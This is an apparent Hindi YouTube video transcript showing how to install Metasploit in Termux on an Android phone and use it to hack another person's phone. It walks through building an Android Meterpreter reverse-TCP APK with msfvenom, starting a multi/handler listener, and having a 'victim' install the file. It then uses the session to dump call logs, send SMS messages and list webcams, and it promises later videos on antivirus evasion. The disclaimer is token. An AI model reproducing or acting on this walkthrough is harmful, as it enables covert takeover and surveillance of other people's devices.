सो हे गाइस व्हाट्सअप, माय नेम इज़ साहिल और आप देख रहे हैं साइबर नूब यूट्यूब चैनल। तो आज की इस वीडियो में हम बात करने वाले एक बहुत ही अमेजिंग हैकिंग टूल के बारे में जिसका नाम है मेटास्प्लॉइट। ये वन ऑफ द मोस्ट फेवरेट टूल होता है हैकर्स का, चाहे वो ब्लैक हैट हैकर हो या फिर वाइट हैट हैकर हो। तो आज इस वीडियो में मैं बताने वाला हूँ कि कैसे आप इस टूल को अपने एंड्रॉयड फ़ोन में इंस्टॉल कर सकते हो और कैसे इस टूल की हेल्प से आप किसी भी एंड्रॉयड स्मार्टफोन को हैक कर सकते हो अपने एंड्रॉयड स्मार्टफोन से। सो लेट्स गेट स्टार्टेड। तो यार वीडियो शुरू करने से पहले आपको एक बात बता दूं कि अगर आपने इस टूल का किसी को भी हार्म पहुंचाने के लिए यूज़ किया तो वो सारी रिस्पॉन्सिबिलिटी आपकी होगी, मेरे चैनल की या फिर इस वीडियो की या फिर मेरी कोई भी रिस्पॉन्सिबिलिटी नहीं होगी। सो प्लीज़ किसी को हार्म पहुंचाने के लिए इस टूल का यूज़ मत करना। सो अब वीडियो स्टार्ट करते हैं। तो सबसे पहले हमारा ऐप ओपन कर लेते हैं, टर्मिक्स ऐप। ठीक है, हो रहा है ओपन। तो ऐप ओपन होने के बाद पहले सबसे पहले आपको इसको अपडेट और अपग्रेड कर लेना है। ठीक है, क्योंकि अगर आपने अपडेट और अपग्रेड इसको नहीं किया तो शायद कुछ इश्यूज आ सकते हैं आपको मेटास्प्लॉइट इंस्टॉलेशन में। तो सबसे पहले हम अपडेट कर लेते हैं इसको, APTUPGRA अपडेट। ओके, APT अपडेट एंड देन APT अपग्रेड। ओके, अपग्रेड। ओके, सो अपडेट एंड अपग्रेड हो रहा है ये। मैंने दोनों कमांड एक ही साथ लगा दिए, अपडेट और अपग्रेड का। आप भी ऐसा कर सकते हो, तो उससे क्या प्रोसेस थोड़ा फास्ट हो जाएगा। ठीक है, ज़रा टाइम नहीं लगेगा। और हाँ, एक और बात आपको बता दूं कि अगर आपके फ़ोन में 1 GB या फिर 2 GB से कम स्पेस है तो शायद ही ये टूल इंस्टॉल हो, क्योंकि यार इसको इंस्टॉल करने के लिए कम से कम आपके फ़ोन में 2 GB फ्री स्पेस होनी चाहिए। ठीक है, मेरे डिवाइस में तो बहुत सारी स्पेस फ्री है, तो आराम से इंस्टॉल हो जाएगा। ठीक है, तो ये सब हो चुका है। अब इसके बाद कमांड लगाना है आपको, ए पैकेज इंस्टॉल अनस्टेबल रिपो, REPO। ओके, ये वाला कमांड लगाना है और अनस्टेबल रिपो इंस्टॉल कर लेना है। ठीक है, तो यार पहले क्या था कि आपको मेटास्प्लॉइट को एक्सटर्नली इंस्टॉल करना पड़ता था टर्मिक्स के अंदर, पर अब क्या है कि 2020 से जो अपग्रेड या फिर 2019 में जो अपग्रेड आया था टर्मिक्स का, तो उसमें जो टर्मिक्स के जो डेवलपर्स हैं उन्होंने एक डिफ़ॉल्ट पैकेज ही मेटास्प्लॉइट को टर्मिक्स का डिफ़ॉल्ट पैकेज ही बना दिया है। तो आप डायरेक्ट ये जो पैकेज वाला जो कमांड है वो लगा के डायरेक्ट इंस्टॉल कर सकते हो। तो आपको बस 2 कमांड लगाने हैं। पहला ये था पैकेज इंस्टॉल रिपो अनस्टेबल रिपो, पैकेज इंस्टॉल अनस्टेबल रिपो, एंड दूसरा कमांड है पैकेज इंस्टॉल मेटास्प्लॉइट, METASPLOIT, मेटास्प्लॉइट, और होने देना है। तो अब ये जो मेटास्प्लॉइट जो इंस्टॉल अगर आपकी नेट की स्पीड अच्छी होगी तो फटाफट इंस्टॉल हो जाएगा 2 या 3 मिनट में। अगर अच्छी नहीं है तो थोड़ा टाइम लगेगा, पर चिंता मत करना, अगर हो जाएगा। अगर आपके फ़ोन में 1 या 2 GB स्पेस फ्री है तो ठीक है, वरना कुछ इश्यूज आ सकते हैं। ठीक है, इंस्टॉलेशन होने में मेरी ठीक ठाक स्पीड आ रही है नेट की, तो ये फटाफट हो रहा है इंस्टॉल। मेक श्योर कि यार कम से कम 1 GB तो खाली हो, 1 GB तो फ्री स्पेस हो आपके डिवाइस में, वरना ये ठीक से काम नहीं करेगा। ठीक है, ये जो भी टूल है मेटास्प्लॉइट आपके डिवाइस में। तो ये इंस्टॉल हो रहा है, डाउनलोड हो रहा है मेटास्प्लॉइट। अभी कम से कम इसको 2 या 3 मिनट लगेंगे, तो आप अपने डिवाइस को आराम से छोड़ सकते हो। ठीक है, इसको कुछ डिवाइस में कुछ आप नहीं करो, कोई एक्शन तो सही रहेगा, वरना फिर क्लोज़ हो सकता है ऑटोमेटिकली ये डाउनलोड प्रोसेस। तो इसको डाउनलोड होने दें। हो रहा है, ठीक है, डाउनलोड हो चुका है। अब ये ऑटोमेटिकली इंस्टॉल कर देगा। ठीक है, पहले क्या करेगा ये कि जो भी इसको मेटास्प्लॉइट को रिक्वायर्ड पैकेजेस हैं वो सारे इंस्टॉल होंगे, और फिर सबसे लास्ट में मेटास्प्लॉइट इंस्टॉल होगा, तो उसमें थोड़ा सा और टाइम लगेगा। यहाँ पे देख सकते हो आप कि ये सारे पैकेजेस ऑटोमेटिकली इंस्टॉल कर रहा है। सबसे लास्ट में फिर मेटास्प्लॉइट इंस्टॉल होगा। ठीक है, थोड़ा वेट करना है यार, 2 से 3 मिनट तो लगेंगे। और हाँ, मैंने इसकी जो कमांड्स की फ़ाइल है वो
उसका फ़ाइल का लिंक जो है वो डिस्क्रिप्शन में दे दिया, तो आप वहाँ से जाके इसके कमांड्स की फ़ाइल डाउनलोड कर सकते हो, ठीक है। तो क्योंकि यार पिछली वाली जो वीडियो है उसमें मैंने बोला था कि डिस्क्रिप्शन से कॉपी कर लेना, बट डिस्क्रिप्शन से कमांड्स कॉपी नहीं होते यूट्यूब पे। तो इस बार मैंने फ़ाइल बना ली है, TXT फाइल है, तो आसानी से डाउनलोड कर सकते, 3 या 4 KB की होगी, तो इजीली डाउनलोड कर लेना। मीडिया फायर का लिंक मैंने दे दिया है नीचे डिस्क्रिप्शन में, तो वहाँ से डाउनलोड कर लेना। तो ठीक है, तो यहाँ पे आप देख सकते हो कि लिखा हुआ आ चुका है, ठीक है, मेटास्प्लॉइट फ्रेमवर्क इंस्टॉल्ड फिनिश, ठीक है। तो इस टर्मिनल को क्लियर कर लेते हैं हम, और अब आपको क्या करना है कि रन करना है मेटास्प्लॉइट को, ठीक है। अब मैं बताऊंगा आपको कि आप कैसे किसी भी एंड्रॉयड फ़ोन को इजीली हैक कर सकते हो मेटास्प्लॉइट फ्रेमवर्क की हेल्प से, ठीक है। तो यहाँ पे कमांड लगाना है आपको MSFCONSOLE, ओके, और ये मेटास्प्लॉइट यहाँ पे लॉन्च हो जाएगा। थोड़ा सा टाइम लेगा ये भी। यहाँ पे आ चुका है स्टार्टिंग द मेटास्प्लॉइट फ्रेमवर्क कंसोल, ओके। और हाँ यार, एक बात और कि ये जब मेटास्प्लॉइट इंस्टॉल करो तो आपको टर्मिक्स में क्या है कि स्टोरेज परमिशन देनी पड़ेगी टर्मिक्स को। यहाँ पे आप देख सकते हो MSF लिखा हुआ आ चुका है, एक बैनर बना हुआ। और अगर आपको चेक करना है कि ये आपका मेटास्प्लॉइट सही से काम कर रहा है या नहीं, तो यहाँ पे आप कमांड लगा सकते हो PANNER, ओके। तो यहाँ पे हम देख सकते हैं कि एक दूसरा बैनर भी शो हो चुका है, तो इसका मतलब कि सही से काम कर रहा है। और आप फिर से आप लगा सकते हो, तो अगर आपको ये अलग अलग बैनर शो हो रहे हैं, इसका मतलब है कि आपका सही से काम कर रहा है, ठीक है। अब मैं बताने वाला हूँ कि कैसे आप किसी भी एंड्रॉयड फ़ोन को हैक कर सकते हो उसको। तो हम इसमें यूज़ करेंगे पेलोड्स, ठीक है। एंड्रॉयड का एक पेलोड बनाएंगे, ठीक है, और उसको हमारे जो भी विक्टिम है उस डिवाइस में इंस्टॉल करना है। और फिर जैसे ही वो इंस्टॉल करेगा तो हमें हमारे इस वाले डिवाइस में, जो हमारा ये मेन डिवाइस है, उसके अंदर हमें मीटर सेशन मिल जाएगा उसका। तो उससे फिर हम कुछ भी कर सकते हैं, जो भी डिवाइस को हमने हैक किया, जो भी विक्टिम का डिवाइस है, उसको हम ईजिली हमारे डिवाइस से कंट्रोल कर सकते हैं। तो ये कैसे करना है मैं बताता हूँ आपको। पर सबसे पहले आपको क्या करना है, न्यू सेशन ओपन करना है, ठीक है। न्यू सेशन ओपन होने के बाद आपको यहाँ पे कमांड लगाना है, ठीक है। यहाँ पे कमांड लगाना टर्म्यूक्स TRMUX और हाइफन सेटअप सेटअप हाइफन स्टोरेज STORAG, ओके। सो इससे क्या है कि टर्म्यूक्स को एक स्टोरेज परमिशन मिल जाएगी, ठीक है। यहाँ पे ये आ चुका है, तो यहाँ आपको अलाउ कर देना है, ठीक है। अलाउ होने के बाद फिर अब आपको क्या करना है कि एक पेलोड क्रिएट करना है, ठीक है। तो पेलोड क्रिएट करने के लिए आपको कमांड लगाना है तो ओके। सो अब आपको एक पेलोड क्रिएट करना है, जो हम हमारे विक्टिम को सेंड करेंगे, और वो जैसे ही उस पेलोड को उसके डिवाइस में इंस्टॉल करेगा, तो हमें यहाँ पे हमारे डिवाइस में एक मीटर सेशन मिल जाएगा, और फिर उससे हम उसके पूरे डिवाइस को कंट्रोल कर सकते हैं, सारे कॉल लॉग्स, उसका वेबकैम ऑन कर सकते हैं, और जो भी वो एक्टिविटी कर रहा है उसके डिवाइस में वो हम यहाँ पे मॉनिटर कर सकते हैं। तो पेलोड बनाने के लिए जो भी कमांड्स हैं वो मैंने उस TXT फाइल में दे दी है, तो आप प्लीज़ डिस्क्रिप्शन से डाउनलोड कर लेना, मैंने डिस्क्रिप्शन में लिंक दे रखा है। और अगर आपको कोई भी इश्यूज़ आते हैं इसको इंस्टॉल करने में या फिर पेलोड क्रिएट करने में, तो आप मुझे स्क्रीनशॉट के साथ इंस्टाग्राम पे DM कर सकते हो, तो वहाँ पे मैं आपके इश्यूज़ को रिजॉल्व कर दूँगा। तो ठीक है, पेलोड क्रिएट करते हैं। तो पेलोड क्रिएट करने के लिए आपको कमांड लगाना है MSF वेनम, ओके, MSF वेनम और -P, क्योंकि हम पेलोड क्रिएट कर रहे हैं तो पेलोड के लिए -P आएगा। और पेलोड किसके लिए क्रिएट कर रहे हैं, तो हम पेलोड क्रिएट कर रहे हैं एंड्रॉयड के लिए, ठीक है। तो यहाँ पे डालना है एंड्रॉयड ENTROID एंड्रॉयड, फिर बैकस्लैश, फिर आता है मीटर मीटर, अरे ठीक है, तो मेरा ये थोड़ा ओके। सो MSF वेनम P एंड्रॉयड मीटर, फिर उससे बैकस्लैश, और फिर यहाँ पे लिखना है रिवर्स TCP REVERS रिवर्स, ओके। सो फिर यहाँ पे लिखना है रिवर्स TCP, ठीक है, REVERS रिवर्स TCP, क्योंकि हमें जो है वो एंड्रॉयड मीटर जो भी बना रहे हैं हम, तो हमें उससे फिर से जो हमारे डिवाइस में है वो कनेक्शन सेंड करे, तो इसके लिए हम रिवर्स TCP प्रोटोकॉल यूज़ करेंगे, ठीक है। तो अब इसके बाद आपको यहाँ लिखना है, आगे कमांड लगाना है lhost, ठीक है, कैपिटल लेटर्स में lhost =,
ठीक है, इक्वल्स टू। अब यहाँ पे आपको क्या करना है, अपनी आईपी एड्रेस देनी है, ठीक है। तो आपकी आईपी एड्रेस आपको कैसे मिलेगी, तो नया सेशन ओपन करना है और यहाँ पे कमांड डालना है आपको, बताता हूँ अभी, ठीक है। तो न्यू सेशन ओपन होने के बाद यहाँ पे आपको कमांड डालना है IF, स्मॉल लेटर्स में IFCONFIG, ठीक है, IF config। तो यहाँ पे जो ये VLAN में आपको दिख रहा है, ठीक है, ब्रश से दिखा देता हूँ मैं। तो यहाँ पे जो ये VLAN दिख रहा है आपको, VLAN में ये वाली IP, तो ये वाली IP यहाँ से आपको कॉपी कर लेनी। और हाँ, एक और बात ये है कि अगर आपके वाईफाई या फिर हॉटस्पॉट ऑन नहीं है डिवाइस आपके एंड्रॉयड फ़ोन का, तो आपको यहाँ पे ये शायद नहीं दिखे ये आईपी एड्रेस, ठीक है। तो मेक श्योर कि ये कमांड लगाने से पहले आप अपने वाईफाई या फिर हॉटस्पॉट ऑन कर लो, ठीक है। और फिर यहाँ से ये आईपी एड्रेस हम कॉपी कर लेते हैं, ठीक है। कॉपी किया और यहाँ पे पेस्ट करना है, ठीक है। तो लोकल होस्ट में मैंने हमारी आईपी दे दी। फिर यहाँ क्या करना है कि आपको एल पोर्ट देना है, ठीक है, कि कौन से पोर्ट पे आप इसको कनेक्ट करना चाहते हो, इसको एंड्रॉयड जो भी हमने पेलोड बनाया उसको, ठीक है, कौन से पोर्ट पे आप लिसन करना चाहते हो, जो भी ये पैकेट्स उस डिवाइस से हमारे डिवाइस में सेंड करेगा, तो कौन से पोर्ट पे आप कनेक्ट करना चाहते हो उस डिवाइस से, ठीक है। तो हम यहाँ पे दे देते हैं LPORT इक्वल्स टू, मैं दे देता हूँ यहाँ पे 8080, ठीक है, 8080। अब यहाँ पे आपको देना है कैपिटल R, ठीक है, और फिर ये वाला जो भी है ग्रेटर देन वाला साइन, ठीक है। फिर यहाँ आगे आपको देना है जो भी आपको पेलोड का नाम रखना है, जैसे मैं रख देता हूँ एंड्रॉयड ANDROID Android.apk, ठीक है। और यहाँ पे एंटर कर देना आप, तो ये पेलोड यहाँ पे जनरेट हो जाएगा, ठीक है। पेलोड जनरेट हो रहा तो थोड़ा सा टाइम लगेगा इसमें, हो रहा है, ठीक है, ठीक है। तो ये पेलोड जनरेट होता है, जब तक मैं इसमें बता देता हूँ आपको। तो यहाँ पे आपको क्या करना है कि हम एक एक्सप्लॉइट यूज़ करने वाले हैं, तो ठीक है। तो यहाँ पे आपको कमांड डालना है यूज़ एक्सप्लॉइट \multi MULTI फिर से बैकस्लैश और हैंडलर HANDLER, ओके, और फिर एंटर कर देना है, ठीक है। तो यहाँ पे मल्टी हैंडलर सेट हो चुका है। अब हमें यूज़ करना है एक पेलोड यूज़ करेंगे हम, ठीक है। तो वही जो पेलोड हमने वहाँ पे जो यहाँ पे डाला था हमने, ठीक है, ये जो पेलोड एंड्रॉयड मीटर रिवर्स TCP, ठीक है, यही वाला पेलोड हम यूज़ करने वाले। तो हमें यहाँ पे सेट करना पड़ेगा, सेट पेलोड PAYLOAD पेलोड एंड्रॉयड, फिर से बैकस्लैश मीटर METER मीटर एंड फिर से बैकस्लैश और यहाँ पे रिवर्स REVER ऐसे रिवर्स एंड रिवर्स और ये TCP, ठीक है, TCP और फिर एंटर। तो ये हमारा पेलोड भी हो चुका है सेट। अब हमें क्या करना है कि यहाँ पे हमारा जो IP एड्रेस है, लोकल IP एड्रेस, वो हमें सेट करना है, ठीक है। तो फिर से कमांड लगाना है सेट, फिर L होस्ट और यहाँ पे अब इक्वल्स टू और कुछ भी नहीं लगाना। और हमारा जो IP एड्रेस था 192.168.1.3, मतलब आपका जो भी IP एड्रेस था वो आपको यहाँ डालना है। मेरा IP एड्रेस ये है, तो मैं यहाँ ये सेट कर रहा हूँ, ठीक है। ये सेट होने के बाद फिर आपको यहाँ पे वो पोर्ट सेट करना है जो आपने एंड्रॉयड मीटर में दिया था, ठीक है। यहाँ पे देख सकते हो आप, मैंने 8080 पोर्ट दिया है, यहाँ पे देख सकते हो L पोर्ट में। तो आपको वही पोर्ट देना है जो आपने वहाँ पे सेलेक्ट किया था एंड्रॉयड जो भी पेलोड के अंदर, ठीक है। तो मैं यहाँ पे पोर्ट सेट कर देता हूँ L पोर्ट, ठीक है। कमांड लगाना L पोर्ट, सेट L पोर्ट, फिर 8080 जो भी आपने पोर्ट सेट किया था वहाँ पे वो आपको सेट कर देना, ठीक है। तो ये सब सेट हो चुका है। अब आपको क्या करना है, जो ये पेलोड बना है तो यहाँ पे इस वाले टर्मिनल पे आना है और यहाँ पे LS करना है आपको, ठीक है। तो यहाँ पे आप देख सकते हो एक APK फाइल जो है मेरे को मिल चुकी है, दिखा देता हूँ आपको। जो ये जो है APK फाइल आप देख सकते हो एंड्रॉयड APK, ठीक है, रेड बॉक्स के अंदर वो यहाँ पे बन चुकी है। तो हमें क्या करना है, इस फाइल को हमारे जो भी इंटरनल स्टोरेज है तो उसके अंदर मूव करना है पहले, क्योंकि हम यहाँ से इस फाइल को एक्सेस नहीं कर पाएंगे, ठीक है। तो हमें इसको मूव करना है हमारे इंटरनल स्टोरेज में। तो हमें कमांड लगाना है
MV और फिर एंड्रॉयड, जो भी ये आपने जो भी फाइल का नाम रखा है, आपके जो भी पेलोड का नाम रखा है, तो वो आपको यहाँ पे टाइप करना है। तो मैं एंड्रॉयड टाइप करता हूँ, एंड्रॉयड, और फिर से बैकस्लैश, ठीक है, बैकस्लैश और फिर STCRD और फिर से बैकस्लैश, ठीक है। तो वो मूव हो चुकी है, ठीक है। यहाँ पे LS करके दिखा देता हूँ, तो यहाँ से वो फाइल जो है हट चुकी है, ठीक है, और मेरे इंटरनल स्टोरेज में आ चुकी है, ठीक है। आपको दिखा देता हूँ मैं, ये मेरा इंटरनल स्टोरेज है। तो यहाँ पे आप देख सकते हो, यहाँ पे आप देख सकते हो ये जो एंड्रॉयड फाइल है वो मेरे इंटरनल स्टोरेज में आ चुकी है, ठीक है। तो अब आपको फिर से अपने टर्मिनल में जाना है, जहाँ पे आपका MSF ये चल रहा है, ठीक है। और यहाँ पे आपको क्लिक करना है एक्सप्लॉइट, यहाँ पे डालना है आपको, ठीक है, एक्सप्लॉइट डालने के बाद यहाँ पे आपको दिख रहा होगा कि ये आ चुका है, स्टार्टेड रिवर्स TCP हैंडल, मतलब कि इसने जो भी ये हमारा IP एड्रेस है और पोर्ट है, इसने लिसन करना शुरू कर दिया। अब वो जैसे ही वो हम इसको इस पेलोड को हमारे डिवाइस में इंस्टॉल करेंगे, ठीक है। तो अब यहाँ पे एक चीज़ और मैं आपको बता दूँ कि इस जो भी हमने पेलोड अभी क्रिएट किया है, इसको सिर्फ आप अपने लोकल एरिया नेटवर्क में ही यूज़ कर सकते हो। जैसे कि अगर आप और आपका जो भी विक्टिम है वो सेम वाईफाई से कनेक्टेड है, तो उसी टाइम आपको यूज़ कर सकते हो, उसी डिवाइस पे आप इसको यूज़ कर सकते हो। अगर आपको वाइड एरिया नेटवर्क पर भी यूज़ करना है और आपको उस टॉपिक पे भी वीडियो चाहिए, तो आप कमेंट्स में मेरे को बता सकते हो, या फिर इंस्टाग्राम पे DM कर सकते हो मुझे, कि आपको अगर वाइड एरिया नेटवर्क में भी ऐसा कुछ करना है तो आप मुझे बता सकते हो, मैं उसके ऊपर भी वीडियो बना दूंगा, ठीक है। और एक और इसका जो ड्रॉबैक है वो ये है कि इसको कोई भी जो अगर किसी एंड्रॉयड फ़ोन में कोई एंटीवायरस नहीं है तो भी वो डिटेक्ट कर लेता है इस वाले जो पेलोड, ये जो पेलोड हमने बनाया है। तो आने वाली वीडियोस में मैं बता दूंगा कि इसको कैसे आप मतलब बना सकते हो, कि आपको कैसे अनडिटेक्टेबल बना सकते हो, कि आप कोई भी इसको डिटेक्ट नहीं कर पाएगा। पर अभी जो है हम वो कोई भी एंड्रॉयड सिक्योरिटी इसको डिटेक्ट कर सकती है, चाहे उसके अंदर अगर एंटीवायरस ना हो तो भी, ठीक है। तो हम इसको कैसे भी इंस्टॉल कर लेते हैं, ठीक है। तो ये बता रहा है ऐप नॉट इंस्टॉल्ड, ओके, क्यों, ठीक है। तो फिर से इंस्टॉल करते हैं एक बार इसको, ऐप नॉट। तो यार वो मेरा जो पुराना वाला जो पेलोड मैंने बनाया था वो काम नहीं कर रहा था, तो मैंने यहाँ पे देख सकते हो आप, मैंने दूसरा पेलोड बनाया, ठीक है। आपके में काम करेगा, पर मैंने क्या है कि पहले भी मैंने बनाया और उसी नाम से बनाया, तो मेरा वो पेलोड काम नहीं कर रहा है, ठीक है। तो आपके यहाँ पे काम करेगा, और मैंने वो पेलोड उसके अंदर इंस्टॉल कर चुका हूँ, ठीक है। तो मैंने जो डिवाइस था, मेरा जो विक्टिम का डिवाइस है, मैंने उसके अंदर इंस्टॉल कर दिया है पेलोड, और यहाँ पर आप देख सकते हो कि मुझे मीटर सेशन मिल चुका है, ठीक है। यहाँ पर आप देख सकते हो ये जो नीचे दिखा रहा है मीटर सेशन, ठीक है। तो यहाँ पे मुझे मीटर सेशन मिल चुका है, और ठीक है, हम यहाँ पे अगर आपको टाइप करना है हेल्प, ठीक है। जैसे ही हेल्प टाइप करोगे तो यहाँ पे आपको इतने सारे जो कमांड्स है वो आप इस जो भी विक्टिम है आपका उसके अंदर एग्जीक्यूट कर सकते हो, अगर दोनों सेम वाईफाई से कनेक्टेड है। अभी जो ये मेरा डिवाइस है, ठीक है, इसमें क्या था कि मेरा जो पेलोड मैंने बनाया था वो मेरे ही डिवाइस में यूज़ कर रहा था, तो वो इंस्टॉल नहीं हुआ, ठीक है। ये जो अभी मेरे इसके अंदर अपडेट आया एंड्रॉयड 10 का, तो वो ऑटोमेटिकली डिटेक्ट कर लेता है इस पेलोड को, तो इसलिए मेरे डिवाइस में इंस्टॉल नहीं हुआ, पर मैंने दूसरे डिवाइस में इंस्टॉल कर दिया है, ठीक है। अभी आप देख नहीं पा रहे, ठीक है, पर मैं इसमें दिखा देता हूँ कि आप कौन कौन से कमांड्स यूज़ कर सकते हो, ठीक है। तो यहाँ पे आप देख सकते हो कि एक्टिविटी स्टार्ट, या फिर आप कोई भी एक्टिविटी उसके अंदर स्टार्ट कर सकते हो, ठीक है। ब्रश देते हैं, तो यहाँ पे आप देख सकते हो एक्टिविटी स्टार्ट एंड चेक रूट करके देखते हैं, ठीक है। चेक रूट यानी कि वो जो डिवाइस विक्टिम का डिवाइस है वो रूटेड है या नहीं है, ठीक है। तो मेरा जो जिसमें मैंने ये इंस्टॉल किया वो रूटेड नहीं है, तो यहाँ पे चेक करते हैं, ठीक है। तो यहाँ पे लिखा हुआ आ गया डिवाइस इज़ नॉट रूटेड, ठीक है। अगर आपको उस डिवाइस के जो भी आपका विक्टिम है डिवाइस है, विक्टिम का डिवाइस है, उसका जो भी अगर कॉल लॉग्स आपको चाहिए तो यहाँ पे आप कर सकते हो डंप कॉल लॉग्स, ठीक है। तो यहाँ पे आपको कमांड लगाना डंप और फिर अंडरस्कोर एंड कॉल लॉग्स, ठीक है, कॉल लॉग्स। तो यहाँ पे आपको, ठीक है, तो ये कमांड थोड़ा गलत हो गया, ठीक है, कॉल लॉग, ठीक है। तो यहाँ पे आप देख सकते हो कि कॉल लॉग्स डंप हो चुके हैं सारे के सारे, आप देख सकते हो 6,378 एंट्रीज़ है, ठीक है, यानी कि इतने जो उसके अंदर कॉल्स किए गए हैं अभी तक, ठीक है। तो ये सारे इस फाइल में आ चुके हैं। अभी यहाँ से ये फाइल आपको कहाँ से एक्सेस करनी है तो वो भी बता देता हूँ। तो आपको जाना है, ठीक है, अपने जो भी इसको क्लियर कर लेते हैं, ठीक है। तो इस टर्मिनल में आ गए और फिर यहाँ पे LS करना है आपको। तो यहाँ पे आप देख सकते हो
आपका ये जो भी है वो उसमें आपने कॉल लॉग्स डंप किए थे उस डिवाइस से, विक्टिम के डिवाइस से, वो यहाँ पे शो हो रहे हैं। तो अगर आप इस फाइल को ओपन करना है तो यहाँ पे आप कमांड लगा सकते हो cat और फिर कॉल और लॉग्स और ये इस फाइल का नाम, और फिर एंटर करना है आपको। तो यहाँ पे नंबर के साथ जितने भी नंबर है वो सारे यहाँ पे शो हो जाएंगे, ठीक है। तो इसको मैं कैंसिल कर देता हूँ, ठीक है, Ctrl+L, यहाँ पे ऐसे ही, ठीक है। तो और जो भी है, जैसे आप विक्टिम के जो भी है विक्टिम का डिवाइस, उससे आप SMS भी सेंड कर सकते हो, ठीक है। सेंड SMS कमांड लगाना है, ठीक है। और फिर यहाँ पे हम देख लेते हैं एक बार कि इसको कैसे यूज़ करना है, ठीक है। सेंड SMS, तो यहाँ पे आप देख सकते हो जैसे भी जो भी कमांड है, ठीक है। तो सेंड SMS और फिर जिस भी नंबर को आपको भेजना है SMS, ठीक है। तो मैं इसी नंबर को SMS सेंड करके दिखा देता हूँ आपको। सेंड SMS, ठीक है। और फिर मेरा नंबर यहाँ पे डाल देता हूँ, ठीक है। और फिर यहाँ पे हाइफन लगाना है और फिर T, यानी T मतलब जो भी आपको टेक्स्ट यहाँ पे भेजना है, ठीक है। तो मैं यहाँ पे जो भी टेक्स्ट सेंड करता हूँ, जैसे कि हेलो यू आर हैक्ड, ठीक है। और फिर एंटर, ठीक है। ओके, क्या क्या बोल रही है? ओके, सो यहाँ पे गलती हो गई है, सेंड _SMS और फिर यहाँ हम D लगाना भूल गए थे, ठीक है। D और फिर से +91 और मेरा नंबर, आपका जो भी जिस भी नंबर को आपको SMS सेंड करना है, ठीक है। और फिर से हाइफन T और जो भी आपको टेक्स्ट सेंड करना है, ठीक है। जैसे हेलो यू आर हैक्ड, ठीक है। सो ये SMS अब सेंड हो रहा है, ठीक है। तो यहाँ पे देखो SMS सेंड्स, तो यहाँ पे आप देख सकते हो हमें SMS आ चुका है, हेलो यू आर हैक्ड, ठीक है। और ऐसे ही आप बहुत सारे, फिर से आपको अगर कमांड्स देखने हैं तो यहाँ पे हेल्प आप डाल सकते हो, ठीक है। और इसमें जैसे आपको स्क्रीनशॉट लेना है तो आप स्क्रीनशॉट भी ले सकते हो, जैसे SCRWN SHOT स्क्रीनशॉट, ठीक है। तो स्क्रीनशॉट थोड़ा इसमें प्रॉब्लम है, ठीक है। तो ये कह रहा है विथ एंड्रॉयड द स्क्रीनशॉट कमांड कैन ओनली कैप्चर द होस्ट एप्लीकेशन इफ़ दिस पेलोड इज होस्टेड इन एन ऐप विदाउट अ यूज़र इंटरफेस डिफ़ॉल्ट वेयर इट कैन नॉट टेक। ओके, तो अभी इसमें कुछ प्रॉब्लम दिखा रहा है, ठीक है। सो बाकी और बहुत सारे इसमें हैं, जैसे कि वेब कैम स्नैप, यानी जो आप विक्टिम है उसको आप देख सकते हो, ठीक है। वेब कैम लिस्ट, ठीक है। हम वेब कैम आप चेक कर सकते हो कि विक्टिम के डिवाइस में कितने कैमराज हैं, ठीक है। तो यहाँ पे हम कमांड लगा देते हैं वेब कैम हाइफन और चेक CHECK, अरे कौन सा, ठीक है। सो कमांड हम यहाँ से कॉपी कर लेते, ठीक है। ओके, ये वेब कैम लिस्ट है इसका नाम, तो हमने गलत कमांड लगा लिया थोड़ा। सो पेस्ट, ओके। सो वेब कैम लिस्ट, ठीक है। तो यहाँ पे हमको पता चलेगा कि वेब कैम जो भी उसका डिवाइस है विक्टिम का, उसके अंदर कितने वेब कैम्स हैं। लोड हो रहा है, ये डिपेंड करेगा कि आपके विक्टिम के डिवाइस में और आपके डिवाइस में कितना जो एंड्रॉयड वो नेट की स्पीड है, ठीक है। तो ये सारे कमांड आप देख सकते हो यार, ठीक है। और डिस्क्रिप्शन में मैंने फ़ाइल का लिंक दे दिया, कमांड्स के लिंक, तो आप वहाँ से जाके इसको डाउनलोड कर सकते हो और इजीली इंस्टॉल कर सकते हो अपने एंड्रॉयड डिवाइस में, ठीक है। तो आज के लिए बस इतना ही, मिलते हैं अगली वीडियो में, तब तक के लिए टाटा बाय बाय, सी यू, हैव अ गुड डे।